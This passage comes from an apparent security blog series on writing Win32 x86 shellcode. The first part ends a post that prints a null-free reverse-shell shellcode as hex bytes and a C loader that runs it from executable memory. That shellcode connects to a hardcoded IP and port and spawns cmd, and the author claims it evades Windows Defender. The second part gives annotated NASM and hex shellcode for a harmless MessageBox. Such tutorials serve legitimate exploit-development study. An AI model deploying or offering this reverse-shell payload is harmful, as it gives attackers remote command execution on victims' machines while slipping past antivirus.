<span class="s">"</span><span class="se">\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x61\x64\x54\x53\xff\xd2\x68\x33\x32\x61\x61\x66\x81\x6c\x24</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x02\x61\x61\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc6\x68\x75</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x68\x57\x53\x41\x53\x54\x56\xff\xd5\x31\xd2\x66\xba\x90\x01</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x29\xd4\x54\x52\xff\xd0\x68\x74\x41\x61\x61\x66\x81\x6c\x24</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x02\x61\x61\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x56</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xff\xd5\x31\xd2\x52\x52\x52\xb2\x06\x52\x80\xea\x05\x52\x42</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x52\xff\xd0\x50\x5f\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x61\x68\x63\x6f\x6e\x6e\x54\x56\xff\xd5\xba\xc1\xa9\x02\xed</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x81\xea\x01\x01\x01\x01\x52\x66\x68\x11\x5c\x31\xd2\xb2\x02</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x66\x52\x89\xe2\x6a\x10\x52\x57\xff\xd0\x31\xc9\x68\x73\x41</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x65\x73\x68</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x53\xff\xd5\x89\xde</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x68\x63\x6d\x64\x61\x66\x83\x6c\x24\x03\x61\x89\xe3\x57\x57</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x57\x31\xff\x6a\x12\x59\x57\xe2\xfd\x66\xc7\x44\x24\x3c\x01</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x01\xc6\x44\x24\x10\x44\x8d\x4c\x24\x10\x54\x51\x57\x57\x57</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x47\x57\x4f\x57\x57\x53\x57\xff\xd0\x83\xc4\x10\x68\x65\x73</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x73\x61\x66\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x78\x69\x74\x54\x56\xff\xd5\x31\xc9\x51\xff\xd0</span><span class="s">"</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"shellcode length: %i"</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="n">LPVOID</span> <span class="n">lpAlloc</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">lpAlloc</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">shellcode</span><span class="p">));</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">lpAlloc</span><span class="p">)();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Compile it on Windows</p>
<pre><code class="language-dos">c:\MinGW\bin>gcc shellcode.c -o shellcode
</code></pre>
<p>Windows 7 (x86)
<img src="/assets/images/windows/x86/reverse_shell_0.gif" alt="" /><br /></p>
<p>and Windows 10 (x86)</p>
<p><img src="/assets/images/windows/x86/reverse_shell_1.gif" alt="" /><br /></p>
<p>The length is 387 bytes and is NULL free.<br />
It seems also that the shellcode bypass Windows Defender AV updated at 15/06/2020</p>
<p><img src="/assets/images/windows/x86/reverse_shell_2.gif" alt="" /><br />
<br />
<img src="/assets/images/windows/x86/reverse_shell_3.gif" alt="" /><br />
<br />
<img src="/assets/images/windows/x86/reverse_shell_4.gif" alt="" /><br /></p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://nostarch.com/malware">This amazing book</a> help me a lot understand how Win32 kernel API works</li>
<li><a href="https://h0mbre.github.io/Babys-First-Shellcode/">The amazing h0mbre blog</a></li>
<li><a href="https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/">Introduction to Windows Shellcode Development – Part 3</a> by <a href="https://twitter.com/NytroRST/">@NytroRST</a></li>
<li><a href="https://0xdarkvortex.dev/index.php/2019/03/18/windows-shellcoding-x86-hunting-kernel32-dll-part-1/">Windows Shellcoding x86 – Hunting Kernel32.dll – Part 1</a> by <a href="https://twitter.com/NinjaParanoid">@NinjaParanoid</a></li>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html#ws">Shellcoding for Linux and Windows Tutorial</a> by <a href="https://twitter.com/lestevehanna">Steve Hanna</a></li>
<li><a href="http://hick.org/code/skape/papers/win32-shellcode.pdf">A good paper book</a></li>
<li><a href="https://marcosvalle.github.io/re/exploit/2019/01/19/messagebox-shellcode.html">Windows x86 MessageBox shellcode</a> by <a href="https://twitter.com/_mvalle_">@MValle</a></li>
<li><a href="https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html">The PacketStorm Calc Shellcode</a></li>
<li><a href="https://github.com/bolonobolo/shellcode">My Github Win x86 shellcode repo</a></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Win32 Shellcode - Spawn MessageBox2019-11-12T00:00:00+00:002019-11-12T00:00:00+00:00https://blackcloud.me/Win32-shellcode-3<p><img src="/assets/images/shell.png" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p><a href="https://blackcloud.me/Win32-shellcode-2/">In the last post</a> we spawned the Calculator on Windows x86. Now we’ll move on a more complicated object. We want to spawn a MessageBox with custom title and text. In this case the MesssageBox function is in the User32.dll library so we need to intruduce a new method: loading a different dll, searching the MessageBox function inside the library and use the with the right parameters.
For our puproses we need to introdice a new function called LoadLibraryA that help us loading the new User32.dll.<br />
The others concepts are more or less the same of the past shellcode</p>
<h2 id="the-shellcode">The Shellcode</h2>
<p>As you can see the first part is the same of the Calc shellcode, but instead of call the <code class="language-plaintext highlighter-rouge">CreateProcessA</code> function, we need the <code class="language-plaintext highlighter-rouge">LoadLibraryA</code> function.
Once the EAX is populated with its address we can call <code class="language-plaintext highlighter-rouge">LoadLibrary("User32.dll")</code> to load the right dll. Then we can use <code class="language-plaintext highlighter-rouge">GetProcAddress</code> to find the <code class="language-plaintext highlighter-rouge">MessageBoxA</code> function inside the right library, <code class="language-plaintext highlighter-rouge">GetProcAddress(User32.dll, MessageBoxA)</code>, last thing is to build the right data structure that rapresent the arguments of the <code class="language-plaintext highlighter-rouge">MessageBoxA</code> function, accordingly with the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messagebox">MSDN</a> documentation.<br />
The comments in the code help understand how it works:<br /></p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>
<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>
<span class="nl">getkernel32:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing register ECX</span>
<span class="nf">mul</span> <span class="nb">ecx</span> <span class="c1">; zeroing register EAX EDX</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">fs</span><span class="p">:</span><span class="nb">ecx</span> <span class="o">+</span> <span class="mh">0x030</span><span class="p">]</span> <span class="c1">; PEB loaded in eax</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x00c</span><span class="p">]</span> <span class="c1">; LDR loaded in eax</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x014</span><span class="p">]</span> <span class="c1">; InMemoryOrderModuleList loaded in esi</span>
<span class="nf">lodsd</span> <span class="c1">; program.exe address loaded in eax (1st module)</span>
<span class="nf">xchg</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">lodsd</span> <span class="c1">; ntdll.dll address loaded (2nd module)</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">]</span> <span class="c1">; kernel32.dll address loaded in ebx (3rd module)</span>
<span class="c1">; EBX = base of kernel32.dll address</span>
<span class="nl">getAddressofName:</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span> <span class="o">+</span> <span class="mh">0x3c</span><span class="p">]</span> <span class="c1">; load e_lfanew address in ebx</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x78</span><span class="p">]</span> <span class="c1">; load data directory</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="c1">; load "address of name"</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="c1">; ESI = RVAs</span>
<span class="nl">getProcAddress:</span>
<span class="nf">inc</span> <span class="nb">ecx</span> <span class="c1">; ordinals increment</span>
<span class="nf">lodsd</span> <span class="c1">; get "address of name" in eax</span>
<span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span><span class="p">],</span> <span class="mh">0x50746547</span> <span class="c1">; GetP</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">],</span> <span class="mh">0x41636F72</span> <span class="c1">; rocA</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">],</span> <span class="mh">0x65726464</span> <span class="c1">; ddre</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nl">getProcAddressFunc:</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x24</span><span class="p">]</span> <span class="c1">; offset ordinals</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; pointer to the name ordinals table</span>
<span class="nf">mov</span> <span class="nb">cx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="c1">; CX = Number of function</span>
<span class="nf">dec</span> <span class="nb">ecx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">]</span> <span class="c1">; ESI = Offset address table</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; we placed at the begin of AddressOfFunctions array</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">4</span><span class="p">]</span> <span class="c1">; EDX = Pointer(offset)</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; EDX = getProcAddress</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; save getProcAddress in EBP for future purpose</span>
<span class="nl">getLoadLibraryA:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing ecx</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; push 0 on stack</span>
<span class="nf">push</span> <span class="mh">0x41797261</span> <span class="c1">; </span>
<span class="nf">push</span> <span class="mh">0x7262694c</span> <span class="c1">; AyrarbiLdaoL</span>
<span class="nf">push</span> <span class="mh">0x64616f4c</span> <span class="c1">;</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebx</span> <span class="c1">; kernel32.dll</span>
<span class="nf">call</span> <span class="nb">edx</span> <span class="c1">; call GetProcAddress and find LoadLibraryA address</span>
<span class="c1">; EAX = LoadLibraryA address</span>
<span class="c1">; EBX = Kernel32.dll address</span>
<span class="c1">; EDX = GetProcAddress address </span>
<span class="nl">getUser32:</span>
<span class="nf">push</span> <span class="mh">0x61616c6c</span> <span class="c1">;</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; aalld.23resU</span>
<span class="nf">push</span> <span class="mh">0x642e3233</span> <span class="c1">; </span>
<span class="nf">push</span> <span class="mh">0x72657355</span> <span class="c1">; </span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call Loadlibrary and load User32.dll</span>
<span class="c1">; EAX = User32.dll address</span>
<span class="c1">; EBX = Kernel32.dll address</span>
<span class="c1">; EBP = GetProcAddress address </span>
<span class="nl">getMessageBox:</span>
<span class="nf">push</span> <span class="mh">0x6141786f</span> <span class="c1">; aAxo : 6141786f</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span>
<span class="nf">push</span> <span class="mh">0x42656761</span> <span class="c1">; Bega : 42656761</span>
<span class="nf">push</span> <span class="mh">0x7373654d</span> <span class="c1">; sseM : 7373654d</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">eax</span> <span class="c1">; User32.dll</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; GetProcAddress(User32.dll, MessageBoxA)</span>
<span class="c1">; EAX 76C6EA71 User32.MessageBoxA</span>
<span class="c1">; ECX 76C10000 OFFSET User32.#2499</span>
<span class="c1">; EDX 00005A12</span>
<span class="c1">; EBX 75290000 kernel32.75290000</span>
<span class="c1">; ESP 0022FF74 ASCII "32.dll"</span>
<span class="c1">; EBP 752E1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 75344DD0 kernel32.75344DD0</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 004010A4 getMessa.004010A4</span>
<span class="nl">MessageBoxA:</span>
<span class="nf">add</span> <span class="nb">esp</span><span class="p">,</span> <span class="mh">0x010</span> <span class="c1">; clean the stack</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="err">'</span><span class="nv">Pwnd</span><span class="s">'
mov edi, esp
push edx
push '</span><span class="nv">Yess</span><span class="err">'</span>
<span class="nf">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; hWnd = NULL</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; the title "dnwP"</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; the message "sseY"</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; uType = NULL</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; MessageBoxA(windowhandle,msg,title,type)</span>
<span class="nl">Exit:</span>
<span class="nf">add</span> <span class="nb">esp</span><span class="p">,</span> <span class="mh">0x010</span> <span class="c1">; clean the stack</span>
<span class="nf">push</span> <span class="mh">0x61737365</span> <span class="c1">; asse</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; asse -a </span>
<span class="nf">push</span> <span class="mh">0x636F7250</span> <span class="c1">; corP</span>
<span class="nf">push</span> <span class="mh">0x74697845</span> <span class="c1">; tixE</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebx</span>
<span class="nf">call</span> <span class="nb">ebp</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="nf">push</span> <span class="nb">ecx</span>
<span class="nf">call</span> <span class="nb">eax</span>
</code></pre></div></div>
<p>Compile it and test it</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@root:# nasm <span class="nt">-f</span> elf32 getMessagebox_shellcode.nasm <span class="p">;</span> ld <span class="nt">-melf_i386</span> <span class="nt">-o</span> getMessagebox_shellcode getMessagebox_shellcode.o
root@root:# objdump <span class="nt">-d</span> ./getMessagebox_shellcode|grep <span class="s1">'[0-9a-f]:'</span>|grep <span class="nt">-v</span> <span class="s1">'file'</span>|cut <span class="nt">-f2</span> <span class="nt">-d</span>:|cut <span class="nt">-f1-7</span> <span class="nt">-d</span><span class="s1">' '</span>|tr <span class="nt">-s</span> <span class="s1">' '</span>|tr <span class="s1">'\t'</span> <span class="s1">' '</span>|sed <span class="s1">'s/ $//g'</span>|sed <span class="s1">'s/ /\\x/g'</span>|paste <span class="nt">-d</span> <span class="s1">''</span> <span class="nt">-s</span> |sed <span class="s1">'s/^/"/'</span>|sed <span class="s1">'s/$/"/g'</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">30</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">40"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">96</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">10"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">3c</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">01"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">38</span><span class="se">\x</span><span class="s2">47</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">81"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">78"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">24"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">4e</span><span class="se">\x</span><span class="s2">49</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">1c"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">69"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">ff"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">33</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">2e</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">55"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">41"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">67"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">42</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">4d</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">ff"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">68"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">77</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">64</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e7</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">59</span><span class="se">\x</span><span class="s2">65"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">73</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">83"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">68"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">45</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">c9"</span>
<span class="s2">"</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">d0"</span>
</code></pre></div></div>
<p>The shellcode.c file</p>
